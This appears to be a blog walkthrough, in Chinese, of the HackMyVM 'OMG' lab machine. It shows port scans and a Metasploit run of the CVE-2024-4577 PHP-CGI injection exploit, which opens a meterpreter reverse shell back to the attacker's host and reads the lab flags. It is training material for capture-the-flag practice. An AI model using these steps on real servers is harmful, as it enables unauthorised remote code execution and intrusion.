Pepster'Blog
HackMyVM-OMG-Walkthrough
城南花已开 Lv6
  2025-02-25 08:01:56   2025-04-18 23:34:08    1.9k 字  11 分钟  

信息收集

服务探测

靶机没什么难度,是个Windows的靶机,直接利用msf即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.207  00:0c:29:be:91:8f       VMware, Inc.
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.123 seconds (120.58 hosts/sec). 4 responded
export ip=192.168.60.207
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Making networking exciting since... whenever.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.207:80
Open 192.168.60.207:135
Open 192.168.60.207:139
Open 192.168.60.207:443
Open 192.168.60.207:445
Open 192.168.60.207:5985
Open 192.168.60.207:47001
Open 192.168.60.207:49664
Open 192.168.60.207:49665
Open 192.168.60.207:49666
Open 192.168.60.207:49667
Open 192.168.60.207:49668
Open 192.168.60.207:49670
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 22:36 CST
Initiating ARP Ping Scan at 22:36
Scanning 192.168.60.207 [1 port]
Completed ARP Ping Scan at 22:36, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:36
Completed Parallel DNS resolution of 1 host. at 22:36, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:36
Scanning 192.168.60.207 [13 ports]
Discovered open port 135/tcp on 192.168.60.207
Discovered open port 443/tcp on 192.168.60.207
Discovered open port 80/tcp on 192.168.60.207
Discovered open port 445/tcp on 192.168.60.207
Discovered open port 49665/tcp on 192.168.60.207
Discovered open port 5985/tcp on 192.168.60.207
Discovered open port 49666/tcp on 192.168.60.207
Discovered open port 49668/tcp on 192.168.60.207
Discovered open port 49670/tcp on 192.168.60.207
Discovered open port 139/tcp on 192.168.60.207
Discovered open port 47001/tcp on 192.168.60.207
Discovered open port 49664/tcp on 192.168.60.207
Discovered open port 49667/tcp on 192.168.60.207
Completed SYN Stealth Scan at 22:36, 0.06s elapsed (13 total ports)
Nmap scan report for 192.168.60.207
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-02-26 22:36:17 CST for 0s

PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 128
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
443/tcp   open  https        syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
5985/tcp  open  wsman        syn-ack ttl 128
47001/tcp open  winrm        syn-ack ttl 128
49664/tcp open  unknown      syn-ack ttl 128
49665/tcp open  unknown      syn-ack ttl 128
49666/tcp open  unknown      syn-ack ttl 128
49667/tcp open  unknown      syn-ack ttl 128
49668/tcp open  unknown      syn-ack ttl 128
49670/tcp open  unknown      syn-ack ttl 128
MAC Address: 00:0C:29:BE:91:8F (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
           Raw packets sent: 14 (600B) | Rcvd: 14 (600B)

我们可以看到靶机notes

image

直接去搜Orange Tsai博客

利用此CVE就可以了

image

用户提权

msfconsole搜索exploit执行即可拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
❯ msfconsole
Metasploit tip: Network adapter names can be used for IP options set LHOST
eth0

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.4.38-dev                          ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post       ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search cve 4577

Matching Modules
================

   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/exchange_ecp_dlp_policy                  2021-01-12       excellent  Yes    Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE
   1  exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577  2024-06-06       excellent  Yes    PHP CGI Argument Injection Remote Code Execution
   2    \_ target: Windows PHP                                      .                .          .      .
   3    \_ target: Windows Command                                  .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command'

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                    yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
   VHOST                            no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.60.100   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows PHP



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set RHOSTS 192.168.60.207
RHOSTS => 192.168.60.207
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.60.100:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache
[*] Sending stage (40004 bytes) to 192.168.60.207
[*] Meterpreter session 3 opened (192.168.60.100:4444 -> 192.168.60.207:49706) at 2025-02-26 22:53:37 +0800

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command                   Description
    -------                   -----------
    cat                       Read the contents of a file to the screen
    cd                        Change directory
    checksum                  Retrieve the checksum of a file
    cp                        Copy source to destination
    del                       Delete the specified file
    dir                       List files (alias for ls)
    download                  Download a file or directory
    edit                      Edit a file
    getlwd                    Print local working directory (alias for lpwd)
    getwd                     Print working directory
    lcat                      Read the contents of a local file to the screen
    lcd                       Change local working directory
    ldir                      List local files (alias for lls)
    lls                       List local files
    lmkdir                    Create new directory on local machine
    lpwd                      Print local working directory
    ls                        List files
    mkdir                     Make directory
    mv                        Move source to destination
    pwd                       Print working directory
    rm                        Delete the specified file
    rmdir                     Remove directory
    search                    Search for files
    upload                    Upload a file or directory


Stdapi: Networking Commands
===========================

    Command                   Description
    -------                   -----------
    portfwd                   Forward a local port to a remote service
    resolve                   Resolve a set of host names on the target


Stdapi: System Commands
=======================

    Command                   Description
    -------                   -----------
    execute                   Execute a command
    getenv                    Get one or more environment variable values
    getpid                    Get the current process identifier
    getuid                    Get the user that the server is running as
    kill                      Terminate a process
    localtime                 Displays the target system local date and time
    pgrep                     Filter processes by name
    pkill                     Terminate processes by name
    ps                        List running processes
    shell                     Drop into a system command shell
    sysinfo                   Gets information about the remote system, such as OS


Stdapi: Audio Output Commands
=============================

    Command                   Description
    -------                   -----------
    play                      play a waveform audio file (.wav) on the target system

For more info on a specific command, use <command> -h or help <command>.

meterpreter > cd ..
meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2025-02-12 23:48:46 +0800  $WinREAgent
040555/r-xr-xr-x  4096   dir   2025-02-12 23:38:15 +0800  Documents and Settings
                                                          DumpStack.log.tmp
040777/rwxrwxrwx  0      dir   2021-05-08 16:15:05 +0800  PerfLogs
040555/r-xr-xr-x  4096   dir   2024-12-12 06:23:32 +0800  Program Files
040777/rwxrwxrwx  4096   dir   2021-05-08 17:34:13 +0800  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2025-02-12 23:41:29 +0800  ProgramData
040777/rwxrwxrwx  0      dir   2024-12-12 06:22:01 +0800  Recovery
040777/rwxrwxrwx  0      dir   2024-12-12 06:21:18 +0800  System Volume Information
040555/r-xr-xr-x  4096   dir   2025-02-12 23:38:15 +0800  Users
040777/rwxrwxrwx  12288  dir   2025-02-12 23:37:55 +0800  Windows
                                                          pagefile.sys
040777/rwxrwxrwx  12288  dir   2025-02-12 23:41:46 +0800  xampp

meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2024-12-12 00:45:41 +0800  Administrator
040777/rwxrwxrwx  4096  dir   2025-02-12 23:41:29 +0800  All Users
040555/r-xr-xr-x  8192  dir   2024-12-12 06:22:00 +0800  Default
040555/r-xr-xr-x  8192  dir   2024-12-12 06:22:00 +0800  Default User
040555/r-xr-xr-x  4096  dir   2024-12-12 06:23:32 +0800  Public
040777/rwxrwxrwx  8192  dir   2025-02-12 23:42:30 +0800  admin
100666/rw-rw-rw-  174   fil   2021-05-08 16:14:03 +0800  desktop.ini

meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2024-12-12 06:23:32 +0800  desktop.ini
100666/rw-rw-rw-  33    fil   2025-02-13 00:25:14 +0800  root.txt
100666/rw-rw-rw-  33    fil   2025-02-13 00:25:05 +0800  user.txt

meterpreter > cat root.txt
af70e9322a562983e01a250ca84fe28d
meterpreter > cat user.txt
4dcd00d9b6c66a0eae4a30aa0c781406

  1. 信息收集
    1. 服务探测
  2. 用户提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
  2. 用户提权